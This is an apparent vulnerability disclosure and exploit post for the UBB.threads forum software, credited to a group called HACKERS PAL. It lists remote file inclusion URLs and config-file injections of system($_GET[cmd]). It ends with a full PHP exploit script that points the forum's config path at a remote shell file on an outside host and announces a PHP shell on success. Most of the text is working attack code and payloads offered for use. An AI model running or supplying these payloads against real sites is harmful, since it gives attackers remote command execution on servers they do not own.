Hello,, UBB.threads Multiple input validation error Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : security@xxxxxxxxx Tested on Version 6 ( and other versions maybe affected Remote File including : ubbt.inc.php?GLOBALS[thispath]=http://localhost/cmd.txt?&cmd=dir ubbt.inc.php?GLOBALS[configdir]=http://localhost/cmd.txt?&cmd=dir ------------------------------------------------------- Files overwrite vulnerabilities if magic_qoutes_gpc = off admin/doedittheme.php?theme[soqor]=".system($_GET[cmd])."&thispath=../ and open includes/theme.inc.php?cmd=ls -la or :- admin/doeditconfig.php?config[soqor]=".system($_GET[cmd])."&thispath=../ and open includes/config.inc.php?cmd=ls -la -- # -- # -- # -- if magic_qoutes_gpc = on admin/doeditconfig.php?thispath=../includes&config[path]=http://psevil.googlepages.com/cmd.txt? and you will have a command execution files .. example dorateuser.php?cmd=ls -la calendar.php?cmd=ls -la and so many other files which includes using this variable ($config[path]) ------------------------------------------------------- Full path cron/php/subscriptions.php ------------------------------------------------------- Exploit :- #!/usr/bin/php -q -d short_open_tag=on <? /* /* UBB.threads Multiple vulnerabilities /* This exploit should allow you to execute commands /* By : HACKERS PAL /* WwW.SoQoR.NeT */ print_r(' /**********************************************/ /* UBB.threads Command Execution */ /* by HACKERS PAL <security@xxxxxxxxx> */ /* site: http://www.soqor.net */'); if ($argc<2) { print_r(' /* -- */ /* Usage: php '.$argv[0].' host /* Example: */ /* php '.$argv[0].' http://localhost/ /**********************************************/ '); die; } error_reporting(0); ini_set("max_execution_time",0); $url=$argv[1]."/"; $exploit="admin/doeditconfig.php?thispath=../includes&config[path]=http://psevil.googlepages.com/cmd.txt?"; $page=$url.$exploit; Function get_page($url) { if(function_exists("file_get_contents")) { $contents = file_get_contents($url); } else { $fp=fopen("$url","r"); while($line=fread($fp,1024)) { $contents=$contents.$line; } } return $contents; } $page = get_page($page); $newpage = get_page($url."calendar.php"); if(eregi("Cannot execute a blank command",$newpage)) { Die("\n[+] Exploit Finished\n[+] Go To : ".$url."calendar.php?cmd=ls -la\n[+] You Got Your Own PHP Shell\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/"); } Else { Die("\n[-] Exploit Failed\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/"); } ?> WwW.SoQoR.NeT